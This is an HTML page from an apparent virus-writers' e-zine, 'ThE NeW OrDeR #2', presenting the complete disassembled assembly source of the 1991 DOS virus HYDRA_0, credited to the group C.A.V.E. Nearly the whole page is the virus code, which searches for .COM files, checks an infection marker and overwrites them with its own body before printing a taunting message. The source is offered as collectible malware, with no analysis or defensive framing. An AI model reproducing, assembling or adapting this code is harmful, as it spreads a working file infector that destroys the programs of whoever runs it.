<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>HYDRA_0</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>DATA_1E EQU 80H<br>
DATA_18E EQU 2E0H<br>
DATA_19E EQU 2E3H<br>
<br>
SEG_A SEGMENT BYTE PUBLIC<br>
ASSUME CS:SEG_A, DS:SEG_A<br>
<br>
<br>
ORG 100h<br>
<br>
HYDRA0 PROC FAR<br>
<br>
START:<br>
JMP LOC_1<br>
DB 59H, 44H, 00H, 00H<br>
DATA_4 DB 'HyDra Beta - Not For Release'<br>
DB '. *.CO?'<br>
DB 0<br>
DATA_7 DW 0, 84FCH<br>
DATA_9 DW 0<br>
DATA_10 DB 0<br>
DB 29 DUP (0)<br>
DATA_11 DB 0<br>
DB 13 DUP (0)<br>
COPYRIGHT DB 'Copyright (c)'<br>
DATA_12 DB ' 1991 by C.A.V.E. HYDRA$'<br>
DB 'Watch for the many heads.', 0DH, 0AH<br>
DB 0DH, 0AH, 0DH, 0AH, 0DH, 0AH, 0DH<br>
DB 0AH, 0DH, 0AH, 0DH, 0AH, 'The fir'<br>
DB 'st eight are easy to find and ki'<br>
DB 'll.', 0DH, 0AH, 0DH, 0AH, 'Their'<br>
DB ' replacements will be more sophi'<br>
DB 'sticated.$'<br>
DB '(c) 1991 - C. A. V. E.$'<br>
LOC_1:<br>
PUSH AX<br>
MOV AX,CS<br>
ADD AX,1000H<br>
XOR DI,DI<br>
MOV CX,2E0H<br>
MOV SI,OFFSET DS:[100H]<br>
MOV ES,AX<br>
REP MOVSB<br>
MOV AH,1AH<br>
MOV DX,OFFSET DATA_10<br>
INT 21H<br>
MOV AH,4EH<br>
MOV DX,OFFSET DATA_4+22H<br>
INT 21H<br>
JC LOC_5<br>
LOC_2:<br>
MOV AH,3DH<br>
MOV AL,2<br>
MOV DX,OFFSET DATA_11<br>
MOV AL,2<br>
INT 21H<br>
MOV BX,AX<br>
PUSH ES<br>
POP DS<br>
MOV AX,3F00H<br>
MOV CX,0FFFFH<br>
MOV DX,DATA_18E<br>
INT 21H <br>
ADD AX,2E0H<br>
MOV CS:DATA_9,AX<br>
CMP WORD PTR DS:DATA_19E,4459H<br>
JNE LOC_3<br>
MOV AH,3EH<br>
INT 21H<br>
PUSH CS<br>
POP DS<br>
MOV AH,4FH<br>
INT 21H<br>
JC LOC_6<br>
JMP SHORT LOC_2<br>
LOC_3:<br>
XOR CX,CX<br>
MOV DX,CX<br>
MOV AX,4200H<br>
INT 21H<br>
JC LOC_4<br>
MOV AH,40H<br>
XOR DX,DX<br>
MOV CX,CS:DATA_9<br>
INT 21H<br>
LOC_4:<br>
MOV AH,3EH<br>
INT 21H<br>
PUSH CS<br>
POP DS<br>
LOC_5:<br>
MOV AH,1AH<br>
MOV DX,DATA_1E<br>
INT 21H<br>
JMP SHORT LOC_7<br>
DB 90H<br>
LOC_6:<br>
PUSH DX<br>
XOR AX,AX<br>
MOV AX,0F00H<br>
INT 10H<br>
MOV AH,0<br>
INT 10H<br>
MOV AX,200H<br>
MOV DH,6<br>
MOV DL,25H<br>
INT 10H<br>
XOR DX,DX<br>
MOV DX,OFFSET DATA_12+14H<br>
MOV AH,9<br>
INT 21H<br>
MOV AX,200H<br>
MOV DH,0BH<br>
MOV DL,1BH<br>
INT 10H <br>
MOV DX,OFFSET DATA_12+1AH<br>
MOV AH,9<br>
INT 21H<br>
MOV AX,200H<br>
MOV DH,17H<br>
MOV DL,0<br>
INT 10H<br>
MOV DX,OFFSET DATA_12+9EH<br>
MOV AH,9<br>
INT 21H<br>
MOV AX,200H<br>
MOV DH,18H<br>
MOV DL,0<br>
INT 10H<br>
MOV AX,4C00H<br>
INT 21H<br>
LOC_7:<br>
XOR DI,DI<br>
MOV SI,OFFSET DATA_16<br>
MOV CX,0D3H<br>
REP MOVSB<br>
POP BX<br>
MOV CS:DATA_7,0<br>
MOV WORD PTR CS:DATA_7+2,ES<br>
POP BX<br>
JMP DWORD PTR CS:DATA_7<br>
DATA_16 DB 1EH<br>
DB 07H,0B9H,0FFH,0FFH,0BEH,0E0H<br>
DB 03H,0BFH, 00H, 01H, 2BH,0CEH<br>
DB 0F3H,0A4H, 2EH,0C7H, 06H, 00H<br>
DB 01H, 00H, 01H, 2EH, 8CH, 1EH<br>
DB 02H, 01H, 8BH,0C3H, 2EH,0FFH<br>
DB 2EH, 00H, 01H<br>
DB ' Coalition of American Viru'<br>
DB 's Engineers -=-=- '<br>
DB ' Dedicated to supporting the'<br>
DB ' anti-virus industry withou'<br>
DB 't recognition or reward. '<br>
DB ' -=-=- '<br>
DB 0CDH, 20H<br>
<br>
HYDRA0 ENDP<br>
<br>
SEG_A ENDS<br>
<br>
<br>
<br>
END START</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
